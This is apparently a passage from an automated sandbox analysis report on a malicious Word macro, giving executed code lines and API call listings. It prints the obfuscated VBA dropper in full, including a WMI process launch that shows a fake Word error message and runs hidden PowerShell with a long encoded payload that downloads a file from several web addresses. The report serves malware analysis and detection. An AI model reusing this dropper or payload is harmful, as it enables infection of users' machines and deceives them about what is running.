                                            ZMdrVHGz.WriteLine "MxCpGaGqBgemCAFEJ"

                                            WriteLine

                                            78

                                            ZMdrVHGz.WriteLine "hbtzFRJEXyDCXI"

                                            WriteLine

                                            79

                                            ZMdrVHGz.WriteLine "zdTcdOoXXUFHJK"

                                            WriteLine

                                            80

                                            Set xPBGH = rJEkbLH

                                            rJEkbLH

                                            81

                                            ZMdrVHGz.Close

                                            Close

                                            82

                                            Set xsruLB = Nothing

                                            83

                                            Set dLRiF = vEBqHrDnD

                                            vEBqHrDnD

                                            84

                                            Set ZMdrVHGz = Nothing

                                            84

                                            ZMdrVHGz:

                                            86

                                            K427k3xfk130n18n = Iogna_9cq5gv + Fo4b_d8mj9usjgaha + Brlo236t2rmfu + t3s + K50yjh8o6l7s

                                            87

                                            Goto fDZVKAAc

                                            88

                                            Dim tzErBRFe as Object

                                            89

                                            Set SeHafBC = tWcKo

                                            tWcKo

                                            90

                                            Set tzErBRFe = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            91

                                            Dim fDZVKAAc as Object

                                            92

                                            Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")

                                            CreateTextFile

                                            93

                                            fDZVKAAc.WriteLine "hKlajOujwgDFAA"

                                            WriteLine

                                            94

                                            fDZVKAAc.WriteLine "JMgUDAIEJlgyNBH"

                                            WriteLine

                                            95

                                            fDZVKAAc.WriteLine "BUUJYAAIoJvLBLAo"

                                            WriteLine

                                            96

                                            Set CHVmaVC = LzxxRHG

                                            LzxxRHG

                                            97

                                            fDZVKAAc.Close

                                            Close

                                            98

                                            Set tzErBRFe = Nothing

                                            99

                                            Set WlBWDXGD = EKezHIC

                                            EKezHIC

                                            100

                                            Set fDZVKAAc = Nothing

                                            100

                                            fDZVKAAc:

                                            102

                                            Lutf6_3d403q9 = Jlda77h_v8nx5(K427k3xfk130n18n)

                                            103

                                            Goto rYbgBh

                                            104

                                            Dim hZCth as Object

                                            105

                                            Set LQqlBAHD = DpYbmDA

                                            DpYbmDA

                                            106

                                            Set hZCth = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            107

                                            Dim rYbgBh as Object

                                            108

                                            Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")

                                            CreateTextFile

                                            109

                                            rYbgBh.WriteLine "CVbRCAAhkhmcDG"

                                            WriteLine

                                            110

                                            rYbgBh.WriteLine "XrrAwQZPjqB"

                                            WriteLine

                                            111

                                            rYbgBh.WriteLine "fxSJajCGlWUEBW"

                                            WriteLine

                                            112

                                            Set phIwFD = hDJDJ

                                            hDJDJ

                                            113

                                            rYbgBh.Close

                                            Close

                                            114

                                            Set hZCth = Nothing

                                            115

                                            Set PnolTIbAB = dXiwA

                                            dXiwA

                                            116

                                            Set rYbgBh = Nothing

                                            116

                                            rYbgBh:

                                            118

                                            Set Mwzin4vxc1irit = CreateObject(Lutf6_3d403q9)

                                            CreateObject("winmgmts:win32_process")

                                            executed
                                            119

                                            Goto GfRPP

                                            120

                                            Dim xLQtMd as Object

                                            121

                                            Set uRnkDGJ = hFSyAfFrF

                                            hFSyAfFrF

                                            122

                                            Set xLQtMd = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            123

                                            Dim GfRPP as Object

                                            124

                                            Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")

                                            CreateTextFile

                                            125

                                            GfRPP.WriteLine "qiXBsMBsLJGbX"

                                            WriteLine

                                            126

                                            GfRPP.WriteLine "mehEFPFHcklgJDDx"

                                            WriteLine

                                            127

                                            GfRPP.WriteLine "BndJDkuVYF"

                                            WriteLine

                                            128

                                            Set xiFRA = hXxQDACJA

                                            hXxQDACJA

                                            129

                                            GfRPP.Close

                                            Close

                                            130

                                            Set xLQtMd = Nothing

                                            131

                                            Set jENfzNH = xkQqDXCcD

                                            xkQqDXCcD

                                            132

                                            Set GfRPP = Nothing

                                            132

                                            GfRPP:

                                            134

                                            Jaaqx1xn5daotw = Mid(sf4, (1 + 4), Len(sf4))

                                            Mid

                                            Len("\x01 ]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAB]anw[3zAF]anw[3YAI]anw[3AAg]anw[3ACg]anw[3AIg]anw[3BLA]anw[3CIA]anw[3KwA]anw[3iAD]anw[3QAN]anw[3wBk]anw[3ACI]anw[3AKQ]anw[3AgA]anw[3CAA]anw[3KAB]anw[3bAH]anw[3QAW]anw[3QBQ]anw[3AGU]anw[3AXQ]anw[3AoA]anw[3CIA]anw[3ewA]anw[30AH]anw[30Ae]anw[3wAx]anw[3AH0]anw[3Aew]anw[3AwA]anw[3H0A]anw[3ewA]anw[3zAH]anw[30Ae]anw[3wAy]anw[3AH0]anw[3AIg]anw[3AtA]anw[3EYA]anw[3JwB]anw[3zAC]anw[3cAL]anw[3AAn]anw[3AHk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3jAF]anw[3QAb]anw[3wBy]anw[3AFk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3VAB]anw[3FAG]anw[30AL]anw[3gBJ]anw[3AG8]anw[3ALg]anw[3BEA]anw[3EkA]anw[3cgA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3ACc]anw[3AKQ]anw[3ApA]anw[3CAA]anw[3IAA]anw[37AC]anw[3AAI]anw[3AAg]anw[3ACA]anw[3AJA]anw[3BXA]anw[3GkA]anw[3OAA]anw[3gAD]anw[30AW]anw[3wB0]anw[3AHk]anw[3AUA]anw[3BlA]anw[3F0A]anw[3KAA]anw[3iAH]anw[3sAM]anw[3gB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3ANA]anw[3B9A]anw[3HsA]anw[3NgB]anw[39AH]anw[3sAN]anw[3QB9]anw[3AHs]anw[3AOA]anw[3B9A]anw[3HsA]anw[3MAB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BnA]anw[3EUA]anw[3UgA]anw[3nAC]anw[3wAJ]anw[3wAu]anw[3AE4]anw[3AZQ]anw[3B0A]anw[3C4A]anw[3UwB]anw[3FAF]anw[3IAV]anw[3gAn]anw[3ACw]anw[3AJw]anw[3BTA]anw[3FkA]anw[3cwA]anw[3nAC]anw[3wAJ]anw[3wBU]anw[3AGU]anw[3AJw]anw[3AsA]anw[3CcA]anw[3SQA]anw[3nAC]anw[3wAJ]anw[3wB0]anw[3AG0]anw[3AQQ]anw[3AnA]anw[3CwA]anw[3JwB]anw[3DAG]anw[3UAU]anw[3ABP]anw[3AEk]anw[3ATg]anw[3AnA]anw[3CwA]anw[3JwB]anw[3tAC]anw[3cAL]anw[3AAn]anw[3AE4]anw[3AYQ]anw[3AnA]anw[3CkA]anw[3IAA]anw[37AC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3AGk]anw[3AbA]anw[3BlA]anw[3G4A]anw[3dAA]anw[3nAC]anw[3sAJ]anw[3wBs]anw[3AHk]anw[3AJw]anw[3ApA]anw[3CsA]anw[3JwB]anw[3DAC]anw[3cAK]anw[3wAo]anw[3ACc]anw[3Abw]anw[3BuA]anw[3CcA]anw[3KwA]anw[3nAH]anw[3QAa]anw[3QAn]anw[3ACk]anw[3AKw]anw[3AnA]anw[3G4A]anw[3JwA]anw[3rAC]anw[3cAd]anw[3QBl]anw[3ACc]anw[3AKQ]anw[3A7A]anw[3CQA]anw[3TwB]anw[3sAD]anw[3kAb]anw[3wBu]anw[3AGs]anw[3AaQ]anw[3A9A]anw[3CQA]anw[3QwA]anw[3wAD]anw[3IAV]anw[3wAg]anw[3ACs]anw[3AIA]anw[3BbA]anw[3GMA]anw[3aAB]anw[3hAH]anw[3IAX]anw[3QAo]anw[3ADY]anw[3ANA]anw[3ApA]anw[3CAA]anw[3KwA]anw[3gAC]anw[3QAQ]anw[3QAw]anw[3ADM]anw[3AUA]anw[3A7A]anw[3CQA]anw[3SAA]anw[3yAD]anw[3cAW]anw[3AA9]anw[3ACg]anw[3AJw]anw[3BJA]anw[3CcA]anw[3KwA]anw[3oAC]anw[3cAN]anw[3gAn]anw[3ACs]anw[3AJw]anw[3A3A]anw[3FEA]anw[3JwA]anw[3pAC]anw[3kAO]anw[3wAg]anw[3ACA]anw[3AKA]anw[3BnA]anw[3GkA]anw[3IAA]anw[3oAC]anw[3IAV]anw[3gBh]anw[3AFI]anw[3AIg]anw[3ArA]anw[3CIA]anw[3aQB]anw[3BAE]anw[3IAT]anw[3ABl]anw[3ADo]anw[3Aaw]anw[3AiA]anw[3CsA]anw[3IgA]anw[30AD]anw[3cAZ]anw[3AAi]anw[3ACk]anw[3AIA]anw[3AgA]anw[3CkA]anw[3LgB]anw[32AG]anw[3EAT]anw[3AB1]anw[3AGU]anw[3AOg]anw[3A6A]anw[3CIA]anw[3QwB]anw[3yAE]anw[3UAY]anw[3ABB]anw[3AGA]anw[3AVA]anw[3BgA]anw[3EUA]anw[3RAB]anw[3JAF]anw[3IAZ]anw[3QBD]anw[3AFQ]anw[3AYA]anw[3BPA]anw[3FIA]anw[3eQA]anw[3iAC]anw[3gAJ]anw[3ABI]anw[3AE8]anw[3ATQ]anw[3BFA]anw[3CAA]anw[3KwA]anw[3) -> 17689

                                            executed
                                            135

                                            Goto sCOIGDtD

                                            136

                                            Dim eepvDEaE as Object

                                            137

                                            Set jzqBlGW = lBenBDA

                                            lBenBDA

                                            138

                                            Set eepvDEaE = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            139

                                            Dim sCOIGDtD as Object

                                            140

                                            Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")

                                            CreateTextFile

                                            141

                                            sCOIGDtD.WriteLine "JTSPCDjykfL"

                                            WriteLine

                                            142

                                            sCOIGDtD.WriteLine "bBmgOCvPPojGGC"

                                            WriteLine

                                            143

                                            sCOIGDtD.WriteLine "anBQXljzGenE"

                                            WriteLine

                                            144

                                            Set tAmQHxlD = UavHTIBHo

                                            UavHTIBHo

                                            145

                                            sCOIGDtD.Close

                                            Close

                                            146

                                            Set eepvDEaE = Nothing

                                            147

                                            Set gphNDVZp = IcAHwPH

                                            IcAHwPH

                                            148

                                            Set sCOIGDtD = Nothing

                                            148

                                            sCOIGDtD:

                                            150

                                            Goto fmwdEMADQ

                                            151

                                            Dim DkLoDL as Object

                                            152

                                            Set plqkuDI = BNmrm

                                            BNmrm

                                            153

                                            Set DkLoDL = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            154

                                            Dim fmwdEMADQ as Object

                                            155

                                            Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")

                                            CreateTextFile

                                            156

                                            fmwdEMADQ.WriteLine "dnUnKFHAkIOdD"

                                            WriteLine

                                            157

                                            fmwdEMADQ.WriteLine "ekluIEBJFIgoBcGC"

                                            WriteLine

                                            158

                                            fmwdEMADQ.WriteLine "BnxHFzJCGhVHrFIm"

                                            WriteLine

                                            159

                                            Set jPJENIo = FLtYjKHC

                                            FLtYjKHC

                                            160

                                            fmwdEMADQ.Close

                                            Close

                                            161

                                            Set DkLoDL = Nothing

                                            162

                                            Set ANzGyzCD = qAUhkIMz

                                            qAUhkIMz

                                            163

                                            Set fmwdEMADQ = Nothing

                                            163

                                            fmwdEMADQ:

                                            165

                                            Mwzin4vxc1irit.Create Jlda77h_v8nx5(Jaaqx1xn5daotw), V2enhc4htwl7z6bh, Thriap3q9rgf3yy9y

                                            SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgA,,) -> 0

                                            V2enhc4htwl7z6bh

                                            Thriap3q9rgf3yy9y

                                            executed
                                            166

                                            Goto pkixJADG

                                            167

                                            Dim DhnHIY as Object

                                            168

                                            Set oQgLUI = zZuzBZGD

                                            zZuzBZGD

                                            169

                                            Set DhnHIY = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            170

                                            Dim pkixJADG as Object

                                            171

                                            Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")

                                            CreateTextFile

                                            172

                                            pkixJADG.WriteLine "fDdPHEjBEnAdZqZFJ"

                                            WriteLine

                                            173

                                            pkixJADG.WriteLine "wypNISsWSXthFJCq"

                                            WriteLine

                                            174

                                            pkixJADG.WriteLine "LvnHAGHfIhRDBRAF"

                                            WriteLine

                                            175

                                            Set ecGmY = OIbfvEEFF

                                            OIbfvEEFF

                                            176

                                            pkixJADG.Close

                                            Close

                                            177

                                            Set DhnHIY = Nothing

                                            178

                                            Set EKmLA = eLmLDU

                                            eLmLDU

                                            179

                                            Set pkixJADG = Nothing

                                            179

                                            pkixJADG:

                                            181

                                            Goto KmGOADt

                                            182

                                            Dim CFdSBD as Object

                                            183

                                            Set nhLeJMLfI = FYVZFEH

                                            FYVZFEH

                                            184

                                            Set CFdSBD = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            185

                                            Dim KmGOADt as Object

                                            186

                                            Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")

                                            CreateTextFile

                                            187

                                            KmGOADt.WriteLine "DBvMcNtCcMyJDDI"

                                            WriteLine

                                            188

                                            KmGOADt.WriteLine "eXpjHFapHaPdRJu"

                                            WriteLine

                                            189

                                            KmGOADt.WriteLine "eXObOTlBAITEOIo"

                                            WriteLine

                                            190

                                            Set STzBjwICv = hoyzuBGCP

                                            hoyzuBGCP

                                            191

                                            KmGOADt.Close

                                            Close

                                            192

                                            Set CFdSBD = Nothing

                                            193

                                            Set ORLICIl = lADFBaJ

                                            lADFBaJ

                                            194

                                            Set KmGOADt = Nothing

                                            194

                                            KmGOADt:

                                            196

                                            End Function

                                            Function Jlda77h_v8nx5, APIs: 201, Strings: 20, Number of lines: 66, Relevance: 388.566
                                            APIsMeta Information

                                            SQQWY

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            ddanFDWJf

                                            Close

                                            RhztCF

                                            kwzjKvZHe

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

